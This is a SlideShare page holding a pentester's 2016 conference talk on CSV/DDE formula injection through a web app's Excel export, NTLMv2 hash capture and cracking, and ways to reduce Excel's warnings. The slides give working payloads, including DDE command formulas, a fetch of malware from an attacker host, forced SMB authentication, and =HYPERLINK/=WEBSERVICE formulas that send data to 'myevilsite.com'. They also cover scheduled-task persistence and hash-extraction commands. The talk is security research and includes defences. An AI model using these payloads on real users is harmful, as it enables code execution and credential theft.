SlideShare a Scribd company logo

BSides MCR 2016: From CSV to CMD to qwerty

Download as PPTX, PDF
J
Jerome Smith

This document describes a penetration test where the attacker was able to execute commands on users' machines by exploiting an Excel export vulnerability in a web application. The attacker was able to retrieve NTLM hashes from low-level users and crack the hashes to obtain domain credentials. The attacker then explored ways to improve the attack by bypassing warnings in Excel and identifying alternative commands besides CMD.exe that could be executed without warnings.

Technology
1 of 46
Downloaded 21 times
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
From CSV to CMD to qwerty A pentesting war story Jerome Smith BSides MCR August 2016
whoami • In computer security for y years • Pentester for p years • At NCC Group for n years • Where y  2p and p  2n and 2n + 5  y • CREST CCT (App) • Presented at first BSides MCR “SSL Checklist for Pentesters” • exploresecurity.com | @exploresecurity 2
Based on a true story... The story, characters, and incidents portrayed in this presentation are real. Any similarity to actual events is completely intentional. Some details have been changed for the sake of anonymity. If you can identify any actual persons, places, buildings or products then I’m in trouble so keep it to yourself. 3
Plot 1. Web application with Excel export 2. Command execution on users’ machines (from CSV to CMD…) 3. Grabbing hashes from low-level users 4. Cracking hashes (…to qwerty) 5. Chase bugs 6. Can we improve the attack? • Why do we get these warnings? • Can we do anything to stop them? 4
5 Setting the scene Background • Global business in finance sector • IIS 6.0 • Classic ASP • What could possibly go wrong? Excel export • Request data • Click export to Excel • Returned JavaScript to build a form • Form POSTed to another page to return the Excel file
6 Final POST
7 Export to Excel page Reflection of user input • Request: http://app/excel.asp?p=hello+world • Returned: HTTP/1.1 200 OK Content-Type: text/html Content-Disposition: attachment; filename="ExcelOuput-46373.xls" Cache-control: public hello world Attack scenarios • Spoof data (deceive victim) • Exploit Excel vulnerabilities • OS command executionIn general, caching of file downloads is often less secure
Exploit Excel vulnerabilities? 8
9 0x01 – 0xFF
10 OS command execution Dynamic Data Exchange (DDE) • Old Microsoft technology to facilitate data transfer between applications • A form of Inter-Process Communication (IPC) • Security risks of Excel export first widely publicised by @albinowax http://www.contextis.com/resources/blog/comma-separated-vulnerabilities/ • Consider: http://app/excel.asp?p=%3dcmd|'%2fk+ipconfig'!A0 • Returns the “XLS” file: =cmd|'/k ipconfig'!A0 service | topic ! item
11 Warnings Why wouldn’t it be secure? The file came from our finance app and I requested it!
12 Command execution cmd /k persists the window for a screenshot Otherwise it runs in a minimised window and exits 
13 Domain credentials • Now how about: • cmd /c <attacker_IPevil$malware.exe • cmd /c net use <attacker_IP>c$ • An ISP should block outbound SMB ports but we’re inside, remember • Domain user account, no pentest laptop … • But another corporate workstation had Wireshark on it Domainusername for free
14 Cracking NTLMv2 – John http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats username:$NETNTLMv2$domain$challenge$HMAC-MD5$blobsmithjer:$NETNTLMv2$domain$challenge$HMAC-MD5$blob
15 NTLM authentication Challenge-response 1. Client → Server (Type 1, negotiation) Features supported by the client and requested of the server 2. Server → Client (Type 2, challenge) Features supported and agreed upon by the server + a challenge 3. Client → Server (Type 3, authentication). More information about the client + response(s) NTLM vs NTLMv2 • All about the calculation of the response • NTLM: MD4 and DES (weak) • NTLMv2: HMAC-MD5 (input > password & challenge, hence “blob”)
16 Type 1 message Type 1 (negotiation) Client OS (Windows 7) N.B. little endian: dec7601 = 0x1DB1 Wireshark filter “ntlmssp”
17 Type 2 message Type 2 (challenge) Challenge Indicates NTLMv2 A block of name-value pairs Info leakage (server)
18 Wireshark extract bytes smithjer:$NETNTLMv2$domain$36edff8376e59e18$HMAC-MD5$blob
19 Type 3 message Domain and username  Looks like NTLMv2 No LM Type 3 (authentication)
20 Type 3 message – drill-down HMAC-MD5  The “blob” is everything after the HMAC in the “NTLM Response tree” • Includes client nonce, timestamp, server’s Target Info block… • Copy NTLM Response bytes, remove first 16 bytes (HMAC) • Likely to start 0x01010000 See, I told you it was v2 ;-) blob 
21 Let’s get cracking smithjer:$NETNTLMv2$domain$36edff8376e59e18$4f68b56e9ce78 8d010f58b4f049b5c7f$0101000000000000295779de01bbd001b6f… John Hashcat
22 Wait a minute... • Tried hashcat test case for NTLMv2… admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958... Recovered......: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts • Tried the same hashcat test case with John – didn’t work • Tried the smithjer hash on a GPU-based rig… Recovered......: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts • Tried the smithjer hash with John in hashcat format – it worked! • So I got my PoC in the report  but why the mixed results?
23 It’s time to activate...
24 John (the Ripper, not Stuart Mill) Hash cracked Hash didn’t crack username::domain:challenge :HMAC-MD5:blob username:$NETNTLMv2$domain$c hallenge$HMAC-MD5$blob • Even though John was identifying the hash… Loaded 1 password hash (NTLMv2 C/R MD4 HMAC-MD5 [32/64]) …it wasn’t processing it correctly • John wanted the hashcat format • To be fair to pentestmonkey, the cheatsheet was… “originally based on john-1.7.8-jumbo-5. Changes in supported hashes or hash formats since then may not be reflected on this page”
25 Hashcat Hash Cracked Didn’t crack admin (test) admin:...:blob[53 bytes] smithjer:...:blob[360 bytes] smithjer oclHashcat (Linux) hashcat (Windows) catflap • Extracts NTLMv2 exchange from Wireshark capture file catflap <capture_file> • Recalculates NTLMv2 response with given password catflap <capture_file | hashcat_file> <password> • Allows experiments with other inputs, i.e. the “blob” • A more faithful check than the standard admin test hash
26 Demo Hashcat had a bug • Wasn’t handling “blobs” above a certain size • Didn’t affect oclHashcat • Didn’t affect hashcat on Linux (1)
Can we improve the attack? - i.e cut out some of those warnings?
28 “Standard” warnings (1) (2a) (3) (2b)
Users and warnings – Piranha 44% clicked through warnings 70% clicked through warnings 75% clicked through warnings
30 Source of warnings • Setting is a property of the file • Only effective if file has been trusted previously • Two stage attack (low and slow)? • Benign payload =NotASheet!A1 • Malicious payload
31 Trusted Documents (1) (2a) Only the filename is stored Downloads with static filenames are of interest Once “trusted” if the file’s start-up prompt is set to auto-update, only the third warning (CMD.EXE) is displayed
32 Excel file format XLSX vs XLS vs CSV • Not something you always have control over • CSV: no Protected View warning • CSV: can’t contain start-up prompt auto-update setting CSV format in XLS file • Format warning instead of Protected View warning • Formal security warnings (1) and (2a) not shown • Therefore file cannot be not “trusted” in the registry • Curiously CSV format not supported: tab or CRLF cell delimiter
33 That CMD.EXE warning Built-in Excel functions • Steal data =HYPERLINK("http://myevilsite.com/?d="&A1,"Click here") • Limited info about the system e.g. current directory =INFO("DIRECTORY"), Excel version =INFO("RELEASE") • =WEBSERVICE(URL) • Sadly doesn’t support authentication (i.e. force NTLM authentication) • Or file paths (local or UNC) or file:// • But it will steal data without user interaction (unlike HYPERLINK) =WEBSERVICE("http://myevilsite.com/?data="&A1) • =FILTERXML(XML, XPATH) • Any XXE or parsing bugs?
34 Alternatives to cmd.exe • =powershell|'Test-Connection 127.0.0.1'!A0 Using 8.3 names doesn’t work as Excel doesn’t like ~ in the formula =cmd|'/k powershell Test-Connection 127.0.0.1'!A0 PATHEXT environment variable ignored – .exe only • .exe files in PATH where filename <= 12 characters =explorer|'https://nccgroup.trust'!A0 =schtasks|'/create /sc DAILY /tn WindowsUpdate /tr calc.exe'!A0 =javaws|'http://myevilsite.com/malware.jnlp'!A0 =rundll32|'shell32.dll,ShellExec_RunDLL calc.exe'!A0 • N.B. if Excel is 32-bit, then the program will be run as such, etc.
35 Native DDE services – 1/2 Tcl (Tool Command Language) • dde services "" "" {Excel {[Book1]Sheet1}} {Excel {[Book1]Sheet2}} {Excel {[Book1]Sheet3}} {Excel System} {PROGMAN PROGMAN} {Shell AppProperties} {Folders AppProperties} {PROGMAN PROGMAN} Excel • dde request excel Sheet1 r1c1:r2c3 • dde execute excel Sheet1 {[formula("overwrite","r1c1")]} • dde execute excel Sheet1 {[alert("hello")][alert("world")]} • dde execute excel Sheet1 {[file.delete("e:test")]} • dde execute excel Sheet1 {[exec("c:windowssystem32calc.exe")]} 
36 Native DDE services – 2/2 Progman • dde execute progman progman {[AddItem(calc.exe,Microsoft Word)]} Folders / Shell • dde execute Folders AppProperties {[ViewFolder("","attacker_IPc$",2)]} What about in Excel? • This could save you hours: when testing, if Excel hangs, try closing Tcl • =Folders|AppProperties!'{[ViewFolder("","c:windows",1)]}'  • That Tcl Service-Topic list wasn’t complete…
37 DDESpy • Part of Visual Studio 6 (!) • Must be running when application launches
38 iexplore DDE • =iexplore|WWW_OpenURL!nccgroup.com • No “remote data not accessible” warning  • Slice of BeEF anyone? • =iexplore|WWW_OpenURL!'<attacker_IP>c$' (force network authentication) • =iexplore|WWW_OpenURL!'c:windowssystem32cmd.exe' • No better than where we were really! • No obvious way to include switches anyway – a limitation of file://
39 firefox DDE • =firefox|WWW_OpenURL!'http://exploresecurity.com/' • =firefox|WWW_GetWindowInfo!foo
40 Demo (1) No Protective View warning as CSV (2) Just “Enable Content” warning as DDE call succeeded • Background navigation to phishing site could be very effective (3) No warnings – exactly which stars were aligned there?! • A file with same name previously downloaded • Had content to elicit warnings, which were accepted • So it’s now “trusted” • Previous file need not have been malicious – remember =NotASheet!A1 • Malicious file’s start-up prompt set to auto-update links
41 Lessons From CSV to CMD • Check out any Excel export that returns user-supplied data • CSV is not a benign format • DDE ≠ macro • In some cases it may be possible to cut down the Excel warnings • Excel may have more to give in this area • Progman|Shell|Folders attractive DDE targets as always running • Very much work in progress – please explore! • All this stuff applies to red-teaming too From CMD to qwerty • Use or develop test cases i.e. something you know should work • Read the errors! • “Authoritative” references can go stale
42 Defence Original article • Prefix = with ' • This will “cast” the cell as text in XLS[X] and stop execution in CSV +cmd|'/k ipconfig'!A0-cmd|'/k ipconfig'!A0 =cmd|'/k ipconfig'!A0 @SUM(cmd|'/k ipconfig'!A0) "=cmd|'/k ipconfig'!A0" ""=cmd|'/k ipconfig'!A0 =(cmd|'/k ipconfig'!A0) =0-cmd|'/k ipconfig'!A0 • Validation against a strict whitelist of “known good” (length, characters, format) should always be the go-to defensive strategy • Otherwise e.g. for XLS[X] consider always prefixing cell with apostrophe
43 References DDE • https://www.tcl.tk/man/tcl8.6/TclCmd/dde.htm (Tcl) • http://rpackages.ianhowson.com/rforge/tcltk2/man/windows/tk2dde.html (examples) • https://support.microsoft.com/en-us/kb/128185 (Excel XLM reference) Hashcat test cases • http://hashcat.net/wiki/doku.php?id=example_hashes Catflap • https://github.com/nccgroup/ (or https://github.com/exploresecurity/catflap) NTLM deep-dive • http://davenport.sourceforge.net/ntlm.html • http://ubiqx.org/cifs/SMB.html#SMB.8 • http://www.innovation.ch/personal/ronald/ntlm.html • http://hashcat.net/forum/archive/index.php?thread-2011.html • https://msdn.microsoft.com/en-us/library/cc207842.aspx
44 Appendix 1: NetNTLMv2 from PCAP Challenge tshark -Y "ntlmssp.messagetype == 0x00000002" -T fields -e ntlmssp.ntlmserverchallenge Domain tshark -Y "ntlmssp.messagetype == 0x00000003" -T fields -e ntlmssp.auth.domain Username tshark -Y "ntlmssp.messagetype == 0x00000003" -T fields -e ntlmssp.auth.username HMAC-MD5 tshark -Y "ntlmssp.messagetype == 0x00000003" -T fields -e ntlmssp.ntlmv2_response | sed 's/://g' | cut -c 1-32 Blob tshark -Y "ntlmssp.messagetype == 0x00000003" -T fields -e ntlmssp.ntlmv2_response | sed 's/://g' | cut -c 33-
45 Appendix 2: NetNTLMv2 calculations 1. NTHASH = MD4(Unicode password) echo -n $2 | iconv -f ascii -t utf16 | tail -c +3 | openssl dgst -md4 – binary | xxd –p 2. INTHASH = HMAC-MD5(Unicode uppercase username | Unicode domain, NTHASH) echo -n ${USERNAME^^}$DOMAIN | iconv -f ascii -t utf16 | tail -c +3 | openssl dgst -md5 -mac HMAC -macopt hexkey:$NTHASH –binary | xxd –p 3. HMAC = HMAC-MD5(Challenge | blob, INTHASH) echo -n $CHALLENGE$BLOB | xxd -r –p | openssl dgst -md5 -mac HMAC - macopt hexkey:$INTHASH –binary | xxd -p
46 fin You have been watching… Jerome @exploresecurity Script passable Hair needs cutting Make-up required Costume is about the right word Tip of the hat to James @albinowax Cara @bones_codes Michael Roberts Andy @ZephrFish Raquel Alvarez

More Related Content

PDF
Object Oriented Exploitation: New techniques in Windows mitigation bypass
Sam Thomas
 
PDF
Harder Faster Stronger
snyff
 
PDF
Ruxmon cve 2012-2661
snyff
 
PPTX
Vulnerabilities on Various Data Processing Levels
Positive Hack Days
 
PPTX
Memory Corruption: from sandbox to SMM
Positive Hack Days
 
PDF
Ruxmon feb 2013 what happened to rails
snyff
 
PDF
Defcon CTF quals
snyff
 
PPTX
Invoke-Obfuscation nullcon 2017
Daniel Bohannon
 
Object Oriented Exploitation: New techniques in Windows mitigation bypass
Sam Thomas
 
Harder Faster Stronger
snyff
 
Ruxmon cve 2012-2661
snyff
 
Vulnerabilities on Various Data Processing Levels
Positive Hack Days
 
Memory Corruption: from sandbox to SMM
Positive Hack Days
 
Ruxmon feb 2013 what happened to rails
snyff
 
Defcon CTF quals
snyff
 
Invoke-Obfuscation nullcon 2017
Daniel Bohannon
 

What's hot (20)

PPTX
Defending Your "Gold"
Will Schroeder
 
PPTX
I hunt sys admins 2.0
Will Schroeder
 
PPTX
Derbycon - Passing the Torch
Will Schroeder
 
PPTX
Building Better Backdoors with WMI - DerbyCon 2017
Alexander Polce Leary
 
PDF
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
Scott Sutherland
 
PPTX
PowerShell for Penetration Testers
Nikhil Mittal
 
PPTX
2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial Emulation
Scott Sutherland
 
PDF
The old is new, again. CVE-2011-2461 is back!
Luca Carettoni
 
PPTX
Secure360 - Extracting Password from Windows
Scott Sutherland
 
PPTX
Wielding a cortana
Will Schroeder
 
PPTX
PowerShell for Cyber Warriors - Bsides Knoxville 2016
Russel Van Tuyl
 
PPT
Advanced Topics On Sql Injection Protection
amiable_indian
 
PDF
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
Hackito Ergo Sum
 
PPTX
Automating Post Exploitation with PowerShell
EnclaveSecurity
 
PDF
Surviving the Java Deserialization Apocalypse // OWASP AppSecEU 2016
Christian Schneider
 
PDF
The Hunter Games: How to Find the Adversary with Event Query Language
Ross Wolf
 
PDF
SANS DFIR Prague: PowerShell & WMI
Joe Slowik
 
PDF
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Chong-Kuan Chen
 
PPTX
Adventures in Asymmetric Warfare
Will Schroeder
 
PDF
Jwt == insecurity?
snyff
 
Defending Your "Gold"
Will Schroeder
 
I hunt sys admins 2.0
Will Schroeder
 
Derbycon - Passing the Torch
Will Schroeder
 
Building Better Backdoors with WMI - DerbyCon 2017
Alexander Polce Leary
 
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
Scott Sutherland
 
PowerShell for Penetration Testers
Nikhil Mittal
 
2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial Emulation
Scott Sutherland
 
The old is new, again. CVE-2011-2461 is back!
Luca Carettoni
 
Secure360 - Extracting Password from Windows
Scott Sutherland
 
Wielding a cortana
Will Schroeder
 
PowerShell for Cyber Warriors - Bsides Knoxville 2016
Russel Van Tuyl
 
Advanced Topics On Sql Injection Protection
amiable_indian
 
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
Hackito Ergo Sum
 
Automating Post Exploitation with PowerShell
EnclaveSecurity
 
Surviving the Java Deserialization Apocalypse // OWASP AppSecEU 2016
Christian Schneider
 
The Hunter Games: How to Find the Adversary with Event Query Language
Ross Wolf
 
SANS DFIR Prague: PowerShell & WMI
Joe Slowik
 
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Chong-Kuan Chen
 
Adventures in Asymmetric Warfare
Will Schroeder
 
Jwt == insecurity?
snyff
 
Ad

Viewers also liked (16)

PPTX
CamSec Sept 2016 - Tricks to improve web app excel export attacks
Jerome Smith
 
PPTX
SSL Checklist for Pentesters (BSides MCR 2014)
Jerome Smith
 
DOC
Malicious file upload attacks - a case study
Oktawian Powazka
 
PPTX
Poodle
Mukesh Chaudhari
 
PPTX
SSL/POODLE: History repeats itself
Yurii Bilyk
 
PPTX
SSLv3 and POODLE
Jerome Smith
 
PDF
Ssl attacks
n|u - The Open Security Community
 
PDF
The Life of Breached Data & The Dark Side of Security
Jarrod Overson
 
PDF
GPU based password recovery on Linux. TXLF 2013
Brad Richardson
 
PPTX
Poodle
Shreyas Kothari
 
PPT
Salt Cryptography & Cracking Salted Hashes by fb1h2s
n|u - The Open Security Community
 
PDF
Password Cracking with Rainbow Tables
Korhan Bircan
 
PPTX
Cyber security and ethical hacking 9
Shekh Md Mehedi Hasan
 
PPTX
Password Attack
Sina Manavi
 
PPTX
Password Cracking
Sina Manavi
 
PDF
How to Become a Thought Leader in Your Niche
Leslie Samuel
 
CamSec Sept 2016 - Tricks to improve web app excel export attacks
Jerome Smith
 
SSL Checklist for Pentesters (BSides MCR 2014)
Jerome Smith
 
Malicious file upload attacks - a case study
Oktawian Powazka
 
Poodle
Mukesh Chaudhari
 
SSL/POODLE: History repeats itself
Yurii Bilyk
 
SSLv3 and POODLE
Jerome Smith
 
Ssl attacks
n|u - The Open Security Community
 
The Life of Breached Data & The Dark Side of Security
Jarrod Overson
 
GPU based password recovery on Linux. TXLF 2013
Brad Richardson
 
Poodle
Shreyas Kothari
 
Salt Cryptography & Cracking Salted Hashes by fb1h2s
n|u - The Open Security Community
 
Password Cracking with Rainbow Tables
Korhan Bircan
 
Cyber security and ethical hacking 9
Shekh Md Mehedi Hasan
 
Password Attack
Sina Manavi
 
Password Cracking
Sina Manavi
 
How to Become a Thought Leader in Your Niche
Leslie Samuel
 
Ad

Similar to BSides MCR 2016: From CSV to CMD to qwerty (20)

PDF
From velvet to silk there is still a lot of sweat
Stefano Maccaglia
 
PPTX
BSides London 2017 - Hunt Or Be Hunted
Alex Davies
 
PPT
Sneaking Past Device Guard - HITB19AMS
Philip Tsukerman
 
PPT
Sneaking Past Device Guard
Philip Tsukerman
 
PDF
CompTIA PenTest+ PT0-003 PDF Questions and Answers.pdf
wilsontank2019
 
PDF
Packet capture and network traffic analysis
CARMEN ALCIVAR
 
PPT
Penetration testing, What’s this?
Dmitry Evteev
 
PDF
Powering up on PowerShell - BSides Charleston - Nov 2018
Fernando Tomlinson, CISSP, MBA
 
PPTX
Client side attacks using PowerShell
Nikhil Mittal
 
PDF
Who Should Use Powershell? You Should Use Powershell!
Ben Finke
 
PDF
Power on, Powershell
Roo7break
 
PPT
Bsides-Philly-2016-Finding-A-Companys-BreakPoint
Zack Meyers
 
PDF
Windows Security Internals 1 / converted Edition James Forshaw
soskoxtamkego
 
PPTX
Top 10 ways to make hackers excited: All about the shortcuts not worth taking
Paula Januszkiewicz
 
PPT
Windows network security
Information Technology
 
PPTX
Teensy Programming for Everyone
Nikhil Mittal
 
PDF
Attacker's Perspective of Active Directory
Sunny Neo
 
PDF
Reducing attack surface on ICS with Windows native solutions
Jan Seidl
 
PDF
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Priyanka Aash
 
PDF
2017-BSidesCharm-DetectingtheElusive-ActiveDirectoryThreatHunting-Final.pdf
khalil511890
 
From velvet to silk there is still a lot of sweat
Stefano Maccaglia
 
BSides London 2017 - Hunt Or Be Hunted
Alex Davies
 
Sneaking Past Device Guard - HITB19AMS
Philip Tsukerman
 
Sneaking Past Device Guard
Philip Tsukerman
 
CompTIA PenTest+ PT0-003 PDF Questions and Answers.pdf
wilsontank2019
 
Packet capture and network traffic analysis
CARMEN ALCIVAR
 
Penetration testing, What’s this?
Dmitry Evteev
 
Powering up on PowerShell - BSides Charleston - Nov 2018
Fernando Tomlinson, CISSP, MBA
 
Client side attacks using PowerShell
Nikhil Mittal
 
Who Should Use Powershell? You Should Use Powershell!
Ben Finke
 
Power on, Powershell
Roo7break
 
Bsides-Philly-2016-Finding-A-Companys-BreakPoint
Zack Meyers
 
Windows Security Internals 1 / converted Edition James Forshaw
soskoxtamkego
 
Top 10 ways to make hackers excited: All about the shortcuts not worth taking
Paula Januszkiewicz
 
Windows network security
Information Technology
 
Teensy Programming for Everyone
Nikhil Mittal
 
Attacker's Perspective of Active Directory
Sunny Neo
 
Reducing attack surface on ICS with Windows native solutions
Jan Seidl
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Priyanka Aash
 
2017-BSidesCharm-DetectingtheElusive-ActiveDirectoryThreatHunting-Final.pdf
khalil511890
 

Recently uploaded (20)

PPTX
MYSQL Presentation for SQL database connectivity
Swati270511
 
PDF
Chapter 3 Spatial Domain Image Processing.pdf
Getnet Tigabie Askale -(GM)
 
PDF
Spectral efficient network and resource selection model in 5G networks
IAESIJAI
 
PDF
Architecting across the Boundaries of two Complex Domains - Healthcare & Tech...
Peter Tan
 
PDF
Review of recent advances in non-invasive hemoglobin estimation
IAESIJAI
 
PDF
Building Integrated photovoltaic BIPV_UPV.pdf
SandeepSingh286037
 
PDF
Advanced methodologies resolving dimensionality complications for autism neur...
IAESIJAI
 
PPTX
Big Data Technologies - Introduction.pptx
kuthubussaman1
 
PPTX
Spectroscopy.pptx food analysis technology
nawahassan45
 
PDF
Machine learning based COVID-19 study performance prediction
IAESIJAI
 
PDF
Optimiser vos workloads AI/ML sur Amazon EC2 et AWS Graviton
Julien SIMON
 
PPTX
ACSFv1EN-58255 AWS Academy Cloud Security Foundations.pptx
23bcla24
 
PPTX
Understanding_Digital_Forensics_Presentation.pptx
ImranKhan423233
 
PDF
Electronic commerce courselecture one. Pdf
OmerMohamed64
 
PDF
Encapsulation theory and applications.pdf
gurumoop
 
PPTX
Cloud computing and distributed systems.
kkkkkhan
 
PDF
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
Jian-Hong Pan
 
PDF
Dropbox Q2 2025 Financial Results & Investor Presentation
Dropbox
 
PDF
Encapsulation_ Review paper, used for researhc scholars
gurumoop
 
PDF
Profit Center Accounting in SAP S/4HANA, S4F28 Col11
Libreria ERP
 
MYSQL Presentation for SQL database connectivity
Swati270511
 
Chapter 3 Spatial Domain Image Processing.pdf
Getnet Tigabie Askale -(GM)
 
Spectral efficient network and resource selection model in 5G networks
IAESIJAI
 
Architecting across the Boundaries of two Complex Domains - Healthcare & Tech...
Peter Tan
 
Review of recent advances in non-invasive hemoglobin estimation
IAESIJAI
 
Building Integrated photovoltaic BIPV_UPV.pdf
SandeepSingh286037
 
Advanced methodologies resolving dimensionality complications for autism neur...
IAESIJAI
 
Big Data Technologies - Introduction.pptx
kuthubussaman1
 
Spectroscopy.pptx food analysis technology
nawahassan45
 
Machine learning based COVID-19 study performance prediction
IAESIJAI
 
Optimiser vos workloads AI/ML sur Amazon EC2 et AWS Graviton
Julien SIMON
 
ACSFv1EN-58255 AWS Academy Cloud Security Foundations.pptx
23bcla24
 
Understanding_Digital_Forensics_Presentation.pptx
ImranKhan423233
 
Electronic commerce courselecture one. Pdf
OmerMohamed64
 
Encapsulation theory and applications.pdf
gurumoop
 
Cloud computing and distributed systems.
kkkkkhan
 
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
Jian-Hong Pan
 
Dropbox Q2 2025 Financial Results & Investor Presentation
Dropbox
 
Encapsulation_ Review paper, used for researhc scholars
gurumoop
 
Profit Center Accounting in SAP S/4HANA, S4F28 Col11
Libreria ERP
 

BSides MCR 2016: From CSV to CMD to qwerty

  • 1. From CSV to CMD to qwerty A pentesting war story Jerome Smith BSides MCR August 2016
  • 2. whoami • In computer security for y years • Pentester for p years • At NCC Group for n years • Where y  2p and p  2n and 2n + 5  y • CREST CCT (App) • Presented at first BSides MCR “SSL Checklist for Pentesters” • exploresecurity.com | @exploresecurity 2
  • 3. Based on a true story... The story, characters, and incidents portrayed in this presentation are real. Any similarity to actual events is completely intentional. Some details have been changed for the sake of anonymity. If you can identify any actual persons, places, buildings or products then I’m in trouble so keep it to yourself. 3
  • 4. Plot 1. Web application with Excel export 2. Command execution on users’ machines (from CSV to CMD…) 3. Grabbing hashes from low-level users 4. Cracking hashes (…to qwerty) 5. Chase bugs 6. Can we improve the attack? • Why do we get these warnings? • Can we do anything to stop them? 4
  • 5. 5 Setting the scene Background • Global business in finance sector • IIS 6.0 • Classic ASP • What could possibly go wrong? Excel export • Request data • Click export to Excel • Returned JavaScript to build a form • Form POSTed to another page to return the Excel file
  • 7. 7 Export to Excel page Reflection of user input • Request: http://app/excel.asp?p=hello+world • Returned: HTTP/1.1 200 OK Content-Type: text/html Content-Disposition: attachment; filename="ExcelOuput-46373.xls" Cache-control: public hello world Attack scenarios • Spoof data (deceive victim) • Exploit Excel vulnerabilities • OS command executionIn general, caching of file downloads is often less secure
  • 10. 10 OS command execution Dynamic Data Exchange (DDE) • Old Microsoft technology to facilitate data transfer between applications • A form of Inter-Process Communication (IPC) • Security risks of Excel export first widely publicised by @albinowax http://www.contextis.com/resources/blog/comma-separated-vulnerabilities/ • Consider: http://app/excel.asp?p=%3dcmd|'%2fk+ipconfig'!A0 • Returns the “XLS” file: =cmd|'/k ipconfig'!A0 service | topic ! item
  • 11. 11 Warnings Why wouldn’t it be secure? The file came from our finance app and I requested it!
  • 12. 12 Command execution cmd /k persists the window for a screenshot Otherwise it runs in a minimised window and exits 
  • 13. 13 Domain credentials • Now how about: • cmd /c <attacker_IPevil$malware.exe • cmd /c net use <attacker_IP>c$ • An ISP should block outbound SMB ports but we’re inside, remember • Domain user account, no pentest laptop … • But another corporate workstation had Wireshark on it Domainusername for free
  • 14. 14 Cracking NTLMv2 – John http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats username:$NETNTLMv2$domain$challenge$HMAC-MD5$blobsmithjer:$NETNTLMv2$domain$challenge$HMAC-MD5$blob
  • 15. 15 NTLM authentication Challenge-response 1. Client → Server (Type 1, negotiation) Features supported by the client and requested of the server 2. Server → Client (Type 2, challenge) Features supported and agreed upon by the server + a challenge 3. Client → Server (Type 3, authentication). More information about the client + response(s) NTLM vs NTLMv2 • All about the calculation of the response • NTLM: MD4 and DES (weak) • NTLMv2: HMAC-MD5 (input > password & challenge, hence “blob”)
  • 16. 16 Type 1 message Type 1 (negotiation) Client OS (Windows 7) N.B. little endian: dec7601 = 0x1DB1 Wireshark filter “ntlmssp”
  • 17. 17 Type 2 message Type 2 (challenge) Challenge Indicates NTLMv2 A block of name-value pairs Info leakage (server)
  • 19. 19 Type 3 message Domain and username  Looks like NTLMv2 No LM Type 3 (authentication)
  • 20. 20 Type 3 message – drill-down HMAC-MD5  The “blob” is everything after the HMAC in the “NTLM Response tree” • Includes client nonce, timestamp, server’s Target Info block… • Copy NTLM Response bytes, remove first 16 bytes (HMAC) • Likely to start 0x01010000 See, I told you it was v2 ;-) blob 
  • 22. 22 Wait a minute... • Tried hashcat test case for NTLMv2… admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958... Recovered......: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts • Tried the same hashcat test case with John – didn’t work • Tried the smithjer hash on a GPU-based rig… Recovered......: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts • Tried the smithjer hash with John in hashcat format – it worked! • So I got my PoC in the report  but why the mixed results?
  • 23. 23 It’s time to activate...
  • 24. 24 John (the Ripper, not Stuart Mill) Hash cracked Hash didn’t crack username::domain:challenge :HMAC-MD5:blob username:$NETNTLMv2$domain$c hallenge$HMAC-MD5$blob • Even though John was identifying the hash… Loaded 1 password hash (NTLMv2 C/R MD4 HMAC-MD5 [32/64]) …it wasn’t processing it correctly • John wanted the hashcat format • To be fair to pentestmonkey, the cheatsheet was… “originally based on john-1.7.8-jumbo-5. Changes in supported hashes or hash formats since then may not be reflected on this page”
  • 25. 25 Hashcat Hash Cracked Didn’t crack admin (test) admin:...:blob[53 bytes] smithjer:...:blob[360 bytes] smithjer oclHashcat (Linux) hashcat (Windows) catflap • Extracts NTLMv2 exchange from Wireshark capture file catflap <capture_file> • Recalculates NTLMv2 response with given password catflap <capture_file | hashcat_file> <password> • Allows experiments with other inputs, i.e. the “blob” • A more faithful check than the standard admin test hash
  • 26. 26 Demo Hashcat had a bug • Wasn’t handling “blobs” above a certain size • Didn’t affect oclHashcat • Didn’t affect hashcat on Linux (1)
  • 27. Can we improve the attack? - i.e cut out some of those warnings?
  • 29. Users and warnings – Piranha 44% clicked through warnings 70% clicked through warnings 75% clicked through warnings
  • 30. 30 Source of warnings • Setting is a property of the file • Only effective if file has been trusted previously • Two stage attack (low and slow)? • Benign payload =NotASheet!A1 • Malicious payload
  • 31. 31 Trusted Documents (1) (2a) Only the filename is stored Downloads with static filenames are of interest Once “trusted” if the file’s start-up prompt is set to auto-update, only the third warning (CMD.EXE) is displayed
  • 32. 32 Excel file format XLSX vs XLS vs CSV • Not something you always have control over • CSV: no Protected View warning • CSV: can’t contain start-up prompt auto-update setting CSV format in XLS file • Format warning instead of Protected View warning • Formal security warnings (1) and (2a) not shown • Therefore file cannot be not “trusted” in the registry • Curiously CSV format not supported: tab or CRLF cell delimiter
